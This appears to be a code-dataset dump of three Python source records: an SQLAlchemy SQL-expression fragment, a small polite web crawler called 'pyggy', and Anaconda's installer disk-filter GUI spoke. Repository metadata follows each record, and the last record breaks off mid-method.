_returning_re = re.compile(r'(?:firebird|postgres(?:ql)?)_returning')
def _process_deprecated_kw(self, kwargs):
for k in list(kwargs):
m = self._returning_re.match(k)
if m:
self._returning = kwargs.pop(k)
util.warn_deprecated(
"The %r argument is deprecated. Please "
"use statement.returning(col1, col2, ...)" % k
)
return kwargs
@_generative
def returning(self, *cols):
"""Add a RETURNING or equivalent clause to this statement.
The given list of columns represent columns within the table
that is the target of the INSERT, UPDATE, or DELETE. Each
element can be any column expression. :class:`~sqlalchemy.schema.Table` objects
will be expanded into their individual columns.
Upon compilation, a RETURNING clause, or database equivalent,
will be rendered within the statement. For INSERT and UPDATE,
the values are the newly inserted/updated values. For DELETE,
the values are those of the rows which were deleted.
Upon execution, the values of the columns to be returned
are made available via the result set and can be iterated
using ``fetchone()`` and similar. For DBAPIs which do not
natively support returning values (i.e. cx_oracle),
SQLAlchemy will approximate this behavior at the result level
so that a reasonable amount of behavioral neutrality is
provided.
Note that not all databases/DBAPIs
support RETURNING. For those backends with no support,
an exception is raised upon compilation and/or execution.
For those who do support it, the functionality across backends
varies greatly, including restrictions on executemany()
and other statements which return multiple rows. Please
read the documentation notes for the database in use in
order to determine the availability of RETURNING.
"""
self._returning = cols
class _ValuesBase(_UpdateBase):
__visit_name__ = 'values_base'
def __init__(self, table, values):
self.table = table
self.parameters = self._process_colparams(values)
@_generative
def values(self, *args, **kwargs):
"""specify the VALUES clause for an INSERT statement, or the SET clause for an
UPDATE.
\**kwargs
key=<somevalue> arguments
\*args
A single dictionary can be sent as the first positional argument. This
allows non-string based keys, such as Column objects, to be used.
"""
if args:
v = args[0]
else:
v = {}
if self.parameters is None:
self.parameters = self._process_colparams(v)
self.parameters.update(kwargs)
else:
self.parameters = self.parameters.copy()
self.parameters.update(self._process_colparams(v))
self.parameters.update(kwargs)
class Insert(_ValuesBase):
"""Represent an INSERT construct.
The :class:`Insert` object is created using the :func:`insert()` function.
"""
__visit_name__ = 'insert'
_prefixes = ()
def __init__(self,
table,
values=None,
inline=False,
bind=None,
prefixes=None,
returning=None,
**kwargs):
_ValuesBase.__init__(self, table, values)
self._bind = bind
self.select = None
self.inline = inline
self._returning = returning
if prefixes:
self._prefixes = tuple([_literal_as_text(p) for p in prefixes])
if kwargs:
self.kwargs = self._process_deprecated_kw(kwargs)
def get_children(self, **kwargs):
if self.select is not None:
return self.select,
else:
return ()
def _copy_internals(self, clone=_clone):
# TODO: coverage
self.parameters = self.parameters.copy()
@_generative
def prefix_with(self, clause):
"""Add a word or expression between INSERT and INTO. Generative.
If multiple prefixes are supplied, they will be separated with
spaces.
"""
clause = _literal_as_text(clause)
self._prefixes = self._prefixes + (clause,)
class Update(_ValuesBase):
"""Represent an Update construct.
The :class:`Update` object is created using the :func:`update()` function.
"""
__visit_name__ = 'update'
def __init__(self,
table,
whereclause,
values=None,
inline=False,
bind=None,
returning=None,
**kwargs):
_ValuesBase.__init__(self, table, values)
self._bind = bind
self._returning = returning
if whereclause is not None:
self._whereclause = _literal_as_text(whereclause)
else:
self._whereclause = None
self.inline = inline
if kwargs:
self.kwargs = self._process_deprecated_kw(kwargs)
def get_children(self, **kwargs):
if self._whereclause is not None:
return self._whereclause,
else:
return ()
def _copy_internals(self, clone=_clone):
# TODO: coverage
self._whereclause = clone(self._whereclause)
self.parameters = self.parameters.copy()
@_generative
def where(self, whereclause):
"""return a new update() construct with the given expression added to its WHERE
clause, joined to the existing clause via AND, if any.
"""
if self._whereclause is not None:
self._whereclause = and_(self._whereclause, _literal_as_text(whereclause))
else:
self._whereclause = _literal_as_text(whereclause)
class Delete(_UpdateBase):
"""Represent a DELETE construct.
The :class:`Delete` object is created using the :func:`delete()` function.
"""
__visit_name__ = 'delete'
def __init__(self,
table,
whereclause,
bind=None,
returning =None,
**kwargs):
self._bind = bind
self.table = table
self._returning = returning
if whereclause is not None:
self._whereclause = _literal_as_text(whereclause)
else:
self._whereclause = None
if kwargs:
self.kwargs = self._process_deprecated_kw(kwargs)
def get_children(self, **kwargs):
if self._whereclause is not None:
return self._whereclause,
else:
return ()
@_generative
def where(self, whereclause):
"""Add the given WHERE clause to a newly returned delete construct."""
if self._whereclause is not None:
self._whereclause = and_(self._whereclause, _literal_as_text(whereclause))
else:
self._whereclause = _literal_as_text(whereclause)
def _copy_internals(self, clone=_clone):
# TODO: coverage
self._whereclause = clone(self._whereclause)
class _IdentifiedClause(Executable, ClauseElement):
__visit_name__ = 'identified'
_execution_options = Executable._execution_options.union({'autocommit':False})
quote = None
def __init__(self, ident):
self.ident = ident
class SavepointClause(_IdentifiedClause):
__visit_name__ = 'savepoint'
class RollbackToSavepointClause(_IdentifiedClause):
__visit_name__ = 'rollback_to_savepoint'
class ReleaseSavepointClause(_IdentifiedClause):
__visit_name__ = 'release_savepoint'
|
obeattie/sqlalchemy
|
lib/sqlalchemy/sql/expression.py
|
Python
|
mit
| 141,178
|
[
"VisIt"
] |
670312249027d556036f315056158b277b97c7a38546fee8470669531adc42cf
|
# Pyggy
#
# Author: Anton Samson <anton@antonsamson.com>
# Available freely at: https://github.com/antsam/pyggy
#
# A web crawler that will save all the pages/files from a specific
# domain/subdomain onto disk.
#
# To start with default settings: python pyggy.py -v
# The -v flag will turn on verbose output so you can see what the
# crawler is currently doing.
#
# Currently does not deep crawl dynamic pages
# e.g. contains ?variable=something
#
# The crawler will save its visited and seed URLs every N page visits.
#
# TODO: Add multi-threading
# TODO: Add support for user authentication/login pages
# TODO: Ignore non HTTP links
#
import sys
import argparse
import hashlib
import os
from time import sleep
from random import randint
import lxml.html.clean
from urlparse import urlparse
import requests
args = []
# Constsants
CONST_HEADERS = {"User-Agent": "Pyggy 0.1 - https://github.com/antsam/pyggy"}
CONST_HTTP = "http://"
CONST_HTTPS = "https://"
CONST_RESUME_FILE_NAME = "resume.dat"
CONST_VISITED_FILE_NAME = "visited.dat"
CONST_DEFAULT_FRONTIER = "https://github.com/antsam/"
CONST_DEFAULT_BASE = "github.com/antsam/"
CONST_DEFAULT_SAVE_PATH = "./data/"
CONST_DEFAULT_SAVE_INTERVAL = int(5)
CONST_DEFAULT_FILE_NAME = "index.html"
CONST_DEFAULT_MIN_WAIT = int(10)
CONST_DEFAULT_MAX_WAIT = int(15)
CONST_DEFAULT_TIMEOUT = int(10)
# Shared variables
_visited = set()
_seeds = set()
# Make a thread sleep
def throttle(lower, upper):
wait = randint(lower, upper)
if(args.verbose):
print "Sleeping for " + str(wait) + " seconds"
sleep(wait)
# Is this document parsable?
def is_text(header):
return header.startswith("text/")
# Get the SHA1 checksum of a file
def file_checksum(fp, block_size = 2**20):
sha1 = hashlib.sha1()
while True:
data = fp.read(block_size)
if not data:
break
sha1.update(data)
return sha1.hexdigest()
# Get the SHA1 hash of a String
def checksum(text):
return hashlib.sha1(text).hexdigest()
# Calculate sha1 of URL
def get_url_hash(url):
return hashlib.sha1(url.lower()).hexdigest()
# Determines a suitable save directory for a given URL
def get_save_dir(url, skip = 1):
parsed = urlparse(url)
dir_path = parsed.path.split("/")
if len(dir_path) >= 2:
dir_path = args.dir + parsed.netloc + "/".join(dir_path[:(-1 * skip)]) + "/"
else:
dir_path = args.dir + parsed.netloc + "/"
return dir_path.replace("//", "/")
# Choose an appropriate filename
# May not always have a file extension
def get_file_name(url, skip = 1):
parsed = urlparse(url)
file_name = parsed.path.split("/")
if (len(file_name) >= 2) and file_name[-1 * skip]:
return file_name[-1 * skip]
return None
# Has the URL been _visited before?
def been_visited(url):
hashed = get_url_hash(url)
if hashed in _visited:
if args.verbose:
print "This URL has already been _visited: " + url
return True
_visited.add(hashed)
return False
# Visit a URL and save it to disk
# Print URL before showing error
def visit(url, base):
if been_visited(url):
return
try:
req = requests.get(url, stream=True, headers=CONST_HEADERS, timeout=args.timeout)
except:
print "Error: Could not retrieve URL: " + url
return
final_url = url
if len(req.history) > 0:
final_url = normalize_url(req.url)
if been_visited(final_url):
return
save_dir = get_save_dir(final_url)
if req.status_code == 200:
raw_data = req.content
can_parse = is_text(req.headers["content-type"])
if can_parse:
if args.verbose:
print "URL appears to contain text content."
if args.clean:
cleaned = lxml.html.clean.clean_html(raw_data)
elif args.verbose:
print "URL data does not appear to contain text content."
file_name = get_file_name(final_url)
if (not file_name) and can_parse:
file_name = CONST_DEFAULT_FILE_NAME
elif not file_name:
save_dir = get_save_dir(final_url, 2)
file_name = get_file_name(final_url, 2)
file_path = save_dir + file_name
if args.verbose:
print "Starting URL: " + url
print "Final URL: " + final_url
print "Save directory: " + save_dir
print "File name: " + file_name
if not os.path.exists(save_dir):
try:
os.makedirs(save_dir)
except:
print "Error: Received malformed URL."
return
if os.path.isfile(file_path):
# do checksums
fh = open(file_path, "r+")
local_checksum = file_checksum(fh)
# TODO: Simplify first two conditions
if args.clean and (checksum(cleaned) == local_checksum) and args.verbose:
print "Page content has not changed."
cleaned = None
elif (checksum(raw_data) == local_checksum) and args.verbose:
print "Page content has not changed."
else:
# Overwrite old data
if args.verbose:
print "Page content has changed since last visit."
fh.seek(0)
if args.clean and can_parse:
fh.write(cleaned)
cleaned = None
else:
fh.write(raw_data)
fh.truncate()
fh.close()
else:
fh = open(file_path, "w")
if can_parse and args.clean:
fh.write(cleaned)
cleaned = None
else:
fh.write(raw_data)
fh.close()
if can_parse:
get_links(url, base, raw_data)
raw_data = None
else:
print "Warning: Received HTTP status code: " + str(req.status_code)
return
# Normalizes URLs
def normalize_url(url):
parsed = urlparse(url)
url_base = parsed.netloc
url_path = parsed.path
if ("." not in url_path) and ((not url_path) or parsed.fragment):
url_path += "/"
url_path = url_path.replace("//", "/")
return parsed.scheme + "://" + url_base + url_path
def in_domain(url, domain):
parsed = urlparse(url)
return ((parsed.scheme in CONST_HTTPS) and (domain.netloc in parsed.netloc) and (domain.path in parsed.path))
# Query for links
def query_links(query, domain):
links = [normalize_url(link) for link in query if in_domain(link, domain)]
return links
# Parse HTML for links
def get_links(url, base, html):
try:
dom = lxml.html.fromstring(html, base_url=CONST_HTTP+base)
except:
print "Error: Could not parse file!"
return
dom.make_links_absolute(url)
domain = urlparse(CONST_HTTP + base)
# TODO: Make this shorter
links = query_links(dom.xpath("//a/@href"), domain) + query_links(dom.xpath("//frame/@src"), domain) + query_links(dom.xpath("//iframe/@src"), domain)
if args.verbose:
print "Newly found links: " + str(len(links))
dom = None
for link in links:
if(get_url_hash(link) not in _visited):
_seeds.add(str(link))
# Load a set from disk
def load_set(name):
if os.path.isfile(args.dir + name):
fh = open(args.dir + name, "r")
resume_data = {normalize_url(line.rstrip()) for line in fh.readlines()}
fh.close()
return resume_data
resume_data = set()
return resume_data
# Save a set to disk
def save_set(name, data):
if not os.path.isfile(args.dir + name):
if not os.path.exists(args.dir):
os.makedirs(args.dir)
fh = open(args.dir + name, "w")
else:
fh = open(args.dir + name, "r+")
fh.seek(0)
for line in data:
fh.write("%s\n" % line)
fh.truncate()
fh.close()
def verify_args():
args.frontier = normalize_url(args.frontier)
if args.dir[-1] != "/":
args.dir += "/"
if not isinstance(args.max, (int, long)) or (args.max <= 0):
args.max = CONST_DEFAULT_MAX_WAIT
if not isinstance(args.min, (int, long)) or (args.min <= 0):
args.min = CONST_DEFAULT_MIN_WAIT
if args.min >= args.max:
args.min = CONST_DEFAULT_MIN_WAIT
args.max = CONST_DEFAULT_MAX_WAIT
if not isinstance(args.interval, (int, long)) or (args.interval <= 0):
args.interval = CONST_DEFAULT_SAVE_INTERVAL
if not isinstance(args.timeout, (int, long)) or (args.timeout <= 0):
args.timeout = CONST_DEFAULT_TIMEOUT
def test():
return
# Main
if __name__ == "__main__":
# Parse any command line args
parser = argparse.ArgumentParser(description="Crawls a domain and downloads copies of each URL _visited.")
parser.add_argument("-b", "--base", help="sets the absolute base for a URL, e.g. www.github.com/", default=CONST_DEFAULT_BASE)
parser.add_argument("-d", "--dir", help="sets the location of where to save crawl data", default=CONST_DEFAULT_SAVE_PATH)
parser.add_argument("-f", "--frontier", help="sets the crawl frontier, e.g. https://www.github.com/antsam", default=CONST_DEFAULT_FRONTIER)
parser.add_argument("-i", "--interval", help="sets the save interval for the URL seed and _visited list", type=int, default=CONST_DEFAULT_SAVE_INTERVAL)
parser.add_argument("-m", "--min", help="sets the minimum wait time in seconds before each crawl", type=int, default=CONST_DEFAULT_MIN_WAIT)
parser.add_argument("-x", "--max", help="sets the maximum wait time in seconds before each crawl", type=int, default=CONST_DEFAULT_MAX_WAIT)
parser.add_argument("-w", "--timeout", help="sets the maximum time to wait in seconds for a URL to load", type=int, default=CONST_DEFAULT_TIMEOUT)
parser.add_argument("-r", "--resume", help="resumes crawling from where we last left off", action="store_true")
parser.add_argument("-v", "--verbose", help="enables verbose output", action="store_true")
parser.add_argument("-c", "--clean", help="HTML data will be cleaned before saving", action="store_true")
args, unknown = parser.parse_known_args()
# Normalize user input
# check that none of the args are invalid, e.g. timeouts and data dirs
verify_args()
if args.verbose:
print args
print unknown
print "Crawler has started!"
print "Frontier: " + args.frontier
print "Base URL: " + args.base
# Populate _seeds
if args.resume:
# Load _seeds and _visited from disk
if(args.verbose):
print "Loading seed URLs from disk."
_seeds.update(load_set(CONST_RESUME_FILE_NAME))
_visited.update(load_set(CONST_VISITED_FILE_NAME))
if len(_seeds) > 0:
domain = urlparse(CONST_HTTP + args.base)
seed = _seeds.pop()
if not in_domain(seed, domain):
print seed
sys.exit("Fatal Error: URL does not belong to the current site! Resumed from wrong site data?")
visit(seed, args.base)
else:
print "Error: Could not load seed URLs from disk. Defaulting to frontier."
visit(args.frontier, args.base)
else:
if args.verbose:
print "Collecting seed URLs from the frontier!"
visit(args.frontier, args.base)
throttle(args.min, args.max)
crawled = 0
while len(_seeds) > 0:
print "Current number of seeds: " + str(len(_seeds))
visit(_seeds.pop(), args.base)
crawled += 1
throttle(args.min, args.max)
if crawled % args.interval == 0:
if args.verbose:
print "Saving seed URLs to disk."
save_set(CONST_RESUME_FILE_NAME, _seeds)
if args.verbose:
print "Saving visited URLs to disk."
save_set(CONST_VISITED_FILE_NAME, _visited)
print "Crawler has finished!"
|
antsam/pyggy
|
pyggy.py
|
Python
|
agpl-3.0
| 11,949
|
[
"VisIt"
] |
1acff71040f45fd8b17d542fc3cbf9c55d75a4ed7770ae8d55fbc8775b6c01f1
|
# Storage filtering classes
#
# Copyright (C) 2013 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Chris Lumens <clumens@redhat.com>
#
from collections import namedtuple
import itertools
from blivet import arch
from blivet.devices import DASDDevice, FcoeDiskDevice, iScsiDiskDevice, MultipathDevice, ZFCPDiskDevice
from blivet.fcoe import has_fcoe
from pyanaconda.flags import flags
from pyanaconda.i18n import CN_, CP_
from pyanaconda.ui.lib.disks import getDisks, isLocalDisk
from pyanaconda.ui.gui.spokes import NormalSpoke
from pyanaconda.ui.gui.spokes.advstorage.fcoe import FCoEDialog
from pyanaconda.ui.gui.spokes.advstorage.iscsi import ISCSIDialog
from pyanaconda.ui.gui.spokes.advstorage.dasd import DASDDialog
from pyanaconda.ui.gui.spokes.lib.cart import SelectedDisksDialog
from pyanaconda.ui.categories.system import SystemCategory
__all__ = ["FilterSpoke"]
DiskStoreRow = namedtuple("DiskStoreRow", ["visible", "selected", "mutable",
"name", "type", "model", "capacity",
"vendor", "interconnect", "serial",
"wwid", "paths", "port", "target",
"lun", "ccw"])
class FilterPage(object):
"""A FilterPage is the logic behind one of the notebook tabs on the filter
UI spoke. Each page has its own specific filtered model overlaid on top
of a common model that holds all non-advanced disks.
A Page is created once, when the filter spoke is initialized. It is
setup multiple times - each time the spoke is revisited. When the Page
is setup, it is given a complete view of all disks that belong on this
Page. This is because certain pages may require populating a combo with
all vendor names, or other similar tasks.
This class is just a base class. One subclass should be created for each
more specialized type of page. Only one instance of each subclass should
ever be created.
"""
def __init__(self, storage, builder):
"""Create a new FilterPage instance.
Instance attributes:
builder -- A reference to the Gtk.Builder instance containing
this page's UI elements.
filterActive -- Whether the user has chosen to filter results down
on this page. If set, visible_func should take the
filter UI elements into account.
storage -- An instance of a blivet object.
"""
self.builder = builder
self.storage = storage
self.model = None
self.filterActive = False
def ismember(self, device):
"""Does device belong on this page? This function should taken into
account what kind of thing device is. It should not be concerned
with any sort of filtering settings. It only determines whether
device belongs.
"""
return True
def setup(self, store, selectedNames, disks):
"""Do whatever setup of the UI is necessary before this page can be
displayed. This function is called every time the filter spoke
is revisited, and thus must first do any cleanup that is necessary.
The setup function is passed a reference to the master store, a list
of names of disks the user has selected (either from a previous visit
or via kickstart), and a list of all disk objects that belong on this
page as determined from the ismember method.
At the least, this method should add all the disks to the store. It
may also need to populate combos and other lists as appropriate.
"""
pass
def clear(self):
"""Blank out any filtering-related fields on this page and return them
to their defaults. This is called when the Clear button is clicked.
"""
pass
def visible_func(self, model, itr, *args):
"""This method is called for every row (disk) in the store, in order to
determine if it should be displayed on this page or not. This method
should take into account whether filterActive is set, perhaps whether
something in pyanaconda.flags is setup, and other settings to make
a final decision. Because filtering can be complicated, many pages
will want to farm this decision out to another method.
The return value is a boolean indicating whether the row is visible
or not.
"""
return True
def setupCombo(self, combo, items):
"""Populate a given GtkComboBoxText instance with a list of items. The
combo will first be cleared, so this method is suitable for calling
repeatedly. The first item in the list will be selected by default.
"""
combo.remove_all()
for i in sorted(items):
combo.append_text(i)
if items:
combo.set_active(0)
def _long_identifier(self, disk):
# For iSCSI devices, we want the long ip-address:port-iscsi-tgtname-lun-XX
# identifier, but blivet doesn't expose that in any useful way and I don't
# want to go asking udev. Instead, we dig around in the deviceLinks and
# default to the name if we can't figure anything else out.
for link in disk.deviceLinks:
if "by-path" in link:
lastSlash = link.rindex("/")+1
return link[lastSlash:]
return disk.name
class SearchPage(FilterPage):
def __init__(self, storage, builder):
FilterPage.__init__(self, storage, builder)
self.model = self.builder.get_object("searchModel")
self.model.set_visible_func(self.visible_func)
self._lunEntry = self.builder.get_object("searchLUNEntry")
self._wwidEntry = self.builder.get_object("searchWWIDEntry")
self._combo = self.builder.get_object("searchTypeCombo")
self._portCombo = self.builder.get_object("searchPortCombo")
self._targetEntry = self.builder.get_object("searchTargetEntry")
def setup(self, store, selectedNames, disks):
self._combo.set_active(0)
self._combo.emit("changed")
ports = []
for disk in disks:
if hasattr(disk, "node"):
ports.append(str(disk.node.port))
self.setupCombo(self.builder.get_object("searchPortCombo"), ports)
def clear(self):
self._lunEntry.set_text("")
self._portCombo.set_active(0)
self._targetEntry.set_text("")
self._wwidEntry.set_text("")
def _port_equal(self, device):
active = self._portCombo.get_active_text()
if active and hasattr(device, "node"):
return device.node.port == active
else:
return True
def _target_equal(self, device):
active = self._targetEntry.get_text().strip()
if active:
return active in getattr(device, "initiator", "")
else:
return True
def _lun_equal(self, device):
active = self._lunEntry.get_text().strip()
if active and hasattr(device, "node"):
try:
return int(active) == device.node.tpgt
except ValueError:
return True
else:
return True
def _filter_func(self, device):
if not self.filterActive:
return True
filterBy = self._combo.get_active()
if filterBy == 0:
return True
elif filterBy == 1:
return self._port_equal(device) and self._target_equal(device) and self._lun_equal(device)
elif filterBy == 2:
return self._wwidEntry.get_text() in getattr(device, "wwid", self._long_identifier(device))
elif filterBy == 3:
return hasattr(device, "fcp_lun") and self._lunEntry.get_text() in device.fcp_lun
def visible_func(self, model, itr, *args):
obj = DiskStoreRow(*model[itr])
device = self.storage.devicetree.getDeviceByName(obj.name, hidden=True)
return self._filter_func(device)
class MultipathPage(FilterPage):
def __init__(self, storage, builder):
FilterPage.__init__(self, storage, builder)
self.model = self.builder.get_object("multipathModel")
self.model.set_visible_func(self.visible_func)
self._combo = self.builder.get_object("multipathTypeCombo")
self._icCombo = self.builder.get_object("multipathInterconnectCombo")
self._vendorCombo = self.builder.get_object("multipathVendorCombo")
self._wwidEntry = self.builder.get_object("multipathWWIDEntry")
def ismember(self, device):
return isinstance(device, MultipathDevice)
def setup(self, store, selectedNames, disks):
vendors = []
interconnects = []
for disk in disks:
paths = [d.name for d in disk.parents]
selected = disk.name in selectedNames
store.append([True, selected, not disk.protected,
disk.name, "", disk.model, str(disk.size),
disk.vendor, disk.bus, disk.serial,
disk.wwid, "\n".join(paths), "", "",
"", ""])
if not disk.vendor in vendors:
vendors.append(disk.vendor)
if not disk.bus in interconnects:
interconnects.append(disk.bus)
self._combo.set_active(0)
self._combo.emit("changed")
self.setupCombo(self._vendorCombo, vendors)
self.setupCombo(self._icCombo, interconnects)
def clear(self):
self._icCombo.set_active(0)
self._vendorCombo.set_active(0)
self._wwidEntry.set_text("")
def _filter_func(self, device):
if not self.filterActive:
return True
filterBy = self._combo.get_active()
if filterBy == 0:
return True
elif filterBy == 1:
return device.vendor == self._vendorCombo.get_active_text()
elif filterBy == 2:
return device.bus == self._icCombo.get_active_text()
elif filterBy == 3:
return self._wwidEntry.get_text() in device.wwid
def visible_func(self, model, itr, *args):
if not flags.mpath:
return False
obj = DiskStoreRow(*model[itr])
device = self.storage.devicetree.getDeviceByName(obj.name, hidden=True)
return self.ismember(device) and self._filter_func(device)
class OtherPage(FilterPage):
def __init__(self, storage, builder):
FilterPage.__init__(self, storage, builder)
self.model = self.builder.get_object("otherModel")
self.model.set_visible_func(self.visible_func)
self._combo = self.builder.get_object("otherTypeCombo")
self._icCombo = self.builder.get_object("otherInterconnectCombo")
self._idEntry = self.builder.get_object("otherIDEntry")
self._vendorCombo = self.builder.get_object("otherVendorCombo")
def ismember(self, device):
return isinstance(device, iScsiDiskDevice) or isinstance(device, FcoeDiskDevice)
def setup(self, store, selectedNames, disks):
vendors = []
interconnects = []
for disk in disks:
selected = disk.name in selectedNames
if hasattr(disk, "node"):
port = str(disk.node.port)
lun = str(disk.node.tpgt)
else:
port = ""
lun = ""
store.append([True, selected, not disk.protected,
disk.name, "", disk.model, str(disk.size),
disk.vendor, disk.bus, disk.serial,
self._long_identifier(disk), "", port, getattr(disk, "initiator", ""),
lun, ""])
if not disk.vendor in vendors:
vendors.append(disk.vendor)
if not disk.bus in interconnects:
interconnects.append(disk.bus)
self._combo.set_active(0)
self._combo.emit("changed")
self.setupCombo(self._vendorCombo, vendors)
self.setupCombo(self._icCombo, interconnects)
def clear(self):
self._icCombo.set_active(0)
self._idEntry.set_text("")
self._vendorCombo.set_active(0)
def _filter_func(self, device):
if not self.filterActive:
return True
filterBy = self._combo.get_active()
if filterBy == 0:
return True
elif filterBy == 1:
return device.vendor == self._vendorCombo.get_active_text()
elif filterBy == 2:
return device.bus == self._icCombo.get_active_text()
elif filterBy == 3:
for link in device.deviceLinks:
if "by-path" in link:
return self._idEntry.get_text().strip() in link
return False
def visible_func(self, model, itr, *args):
obj = DiskStoreRow(*model[itr])
device = self.storage.devicetree.getDeviceByName(obj.name, hidden=True)
return self.ismember(device) and self._filter_func(device)
class ZPage(FilterPage):
def __init__(self, storage, builder):
FilterPage.__init__(self, storage, builder)
self.model = self.builder.get_object("zModel")
self.model.set_visible_func(self.visible_func)
self._isS390 = arch.isS390()
def ismember(self, device):
return isinstance(device, ZFCPDiskDevice) or isinstance(device, DASDDevice)
def setup(self, store, selectedNames, disks):
if not self._isS390:
return
def visible_func(self, model, itr, *args):
obj = DiskStoreRow(*model[itr])
device = self.storage.devicetree.getDeviceByName(obj.name, hidden=True)
return self.ismember(device)
class FilterSpoke(NormalSpoke):
builderObjects = ["diskStore", "filterWindow",
"searchModel", "multipathModel", "otherModel", "zModel"]
mainWidgetName = "filterWindow"
uiFile = "spokes/filter.glade"
helpFile = "FilterSpoke.xml"
category = SystemCategory
title = CN_("GUI|Spoke", "_INSTALLATION DESTINATION")
def __init__(self, *args):
NormalSpoke.__init__(self, *args)
self.applyOnSkip = True
self.ancestors = []
self.disks = []
self.selected_disks = []
@property
def indirect(self):
return True
# This spoke has no status since it's not in a hub
@property
def status(self):
return None
def apply(self):
onlyuse = self.selected_disks[:]
for disk in [d for d in self.storage.disks if d.name in onlyuse]:
onlyuse.extend([d.name for d in disk.ancestors
if d.name not in onlyuse])
self.data.ignoredisk.onlyuse = onlyuse
self.data.clearpart.drives = self.selected_disks[:]
def initialize(self):
NormalSpoke.initialize(self)
self.pages = [SearchPage(self.storage, self.builder),
MultipathPage(self.storage, self.builder),
OtherPage(self.storage, self.builder),
ZPage(self.storage, self.builder)]
self._notebook = self.builder.get_object("advancedNotebook")
if not arch.isS390():
self._notebook.remove_page(-1)
self.builder.get_object("addZFCPButton").destroy()
self.builder.get_object("addDASDButton").destroy()
if not has_fcoe():
self.builder.get_object("addFCOEButton").destroy()
self._store = self.builder.get_object("diskStore")
self._addDisksButton = self.builder.get_object("addDisksButton")
def _real_ancestors(self, disk):
# Return a list of all the ancestors of a disk, but remove the disk
# itself from this list.
return [d for d in disk.ancestors if d.name != disk.name]
def refresh(self):
NormalSpoke.refresh(self)
self.disks = getDisks(self.storage.devicetree)
self.selected_disks = self.data.ignoredisk.onlyuse[:]
self.ancestors = itertools.chain(*map(self._real_ancestors, self.disks))
self.ancestors = map(lambda d: d.name, self.ancestors)
self._store.clear()
allDisks = []
multipathDisks = []
otherDisks = []
zDisks = []
# Now all all the non-local disks to the store. Everything has been set up
# ahead of time, so there's no need to configure anything. We first make
# these lists of disks, then call setup on each individual page. This is
# because there could be page-specific setup to do that requires a complete
# view of all the disks on that page.
for disk in itertools.ifilterfalse(isLocalDisk, self.disks):
if self.pages[1].ismember(disk):
multipathDisks.append(disk)
elif self.pages[2].ismember(disk):
otherDisks.append(disk)
elif self.pages[3].ismember(disk):
zDisks.append(disk)
allDisks.append(disk)
self.pages[0].setup(self._store, self.selected_disks, allDisks)
self.pages[1].setup(self._store, self.selected_disks, multipathDisks)
self.pages[2].setup(self._store, self.selected_disks, otherDisks)
self.pages[3].setup(self._store, self.selected_disks, zDisks)
self._update_summary()
def _update_summary(self):
summaryButton = self.builder.get_object("summary_button")
label = self.builder.get_object("summary_button_label")
# We need to remove ancestor devices from the count. Otherwise, we'll
# end up in a situation where selecting one multipath device could
# potentially show three devices selected (mpatha, sda, sdb for instance).
count = len([disk for disk in self.selected_disks if disk not in self.ancestors])
summary = CP_("GUI|Installation Destination|Filter",
"%d _storage device selected",
"%d _storage devices selected",
count) % count
label.set_text(summary)
label.set_use_underline(True)
summaryButton.set_visible(count > 0)
label.set_sensitive(count > 0)
def on_back_clicked(self, button):
self.skipTo = "StorageSpoke"
NormalSpoke.on_back_clicked(self, button)
def on_summary_clicked(self, button):
dialog = SelectedDisksDialog(self.data)
# Include any disks selected in the initial storage spoke, plus any
# selected in this filter UI.
disks = [disk for disk in self.disks if disk.name in self.selected_disks]
free_space = self.storage.getFreeSpace(disks=disks)
with self.main_window.enlightbox(dialog.window):
dialog.refresh(disks, free_space, showRemove=False, setBoot=False)
dialog.run()
def on_find_clicked(self, button):
n = self._notebook.get_current_page()
self.pages[n].filterActive = True
self.pages[n].model.refilter()
def on_clear_clicked(self, button):
n = self._notebook.get_current_page()
self.pages[n].filterActive = False
self.pages[n].model.refilter()
self.pages[n].clear()
def on_page_switched(self, notebook, newPage, newPageNum, *args):
self.pages[newPageNum].model.refilter()
notebook.get_nth_page(newPageNum).show_all()
def on_row_toggled(self, button, path):
if not path:
return
page_index = self._notebook.get_current_page()
filter_model = self.pages[page_index].model
model_itr = filter_model.get_iter(path)
itr = filter_model.convert_iter_to_child_iter(model_itr)
self._store[itr][1] = not self._store[itr][1]
if self._store[itr][1] and self._store[itr][3] not in self.selected_disks:
self.selected_disks.append(self._store[itr][3])
elif not self._store[itr][1] and self._store[itr][3] in self.selected_disks:
self.selected_disks.remove(self._store[itr][3])
self._update_summary()
def on_add_iscsi_clicked(self, widget, *args):
dialog = ISCSIDialog(self.data, self.storage)
with self.main_window.enlightbox(dialog.window):
dialog.refresh()
dialog.run()
# We now need to refresh so any new disks picked up by adding advanced
# storage are displayed in the UI.
self.refresh()
def on_add_fcoe_clicked(self, widget, *args):
dialog = FCoEDialog(self.data, self.storage)
with self.main_window.enlightbox(dialog.window):
dialog.refresh()
dialog.run()
# We now need to refresh so any new disks picked up by adding advanced
# storage are displayed in the UI.
self.refresh()
def on_add_zfcp_clicked(self, widget, *args):
pass
def on_add_dasd_clicked(self, widget, *args):
dialog = DASDDialog(self.data, self.storage)
with self.main_window.enlightbox(dialog.window):
dialog.refresh()
dialog.run()
# We now need to refresh so any new disks picked up by adding advanced
# storage are displayed in the UI.
self.refresh()
##
## SEARCH TAB SIGNAL HANDLERS
##
def on_search_type_changed(self, combo):
ndx = combo.get_active()
notebook = self.builder.get_object("searchTypeNotebook")
findButton = self.builder.get_object("searchFindButton")
clearButton = self.builder.get_object("searchClearButton")
findButton.set_sensitive(ndx != 0)
clearButton.set_sensitive(ndx != 0)
notebook.set_current_page(ndx)
##
## MULTIPATH TAB SIGNAL HANDLERS
##
def on_multipath_type_changed(self, combo):
ndx = combo.get_active()
notebook = self.builder.get_object("multipathTypeNotebook")
findButton = self.builder.get_object("multipathFindButton")
clearButton = self.builder.get_object("multipathClearButton")
findButton.set_sensitive(ndx != 0)
clearButton.set_sensitive(ndx != 0)
notebook.set_current_page(ndx)
##
## OTHER TAB SIGNAL HANDLERS
##
def on_other_type_combo_changed(self, combo):
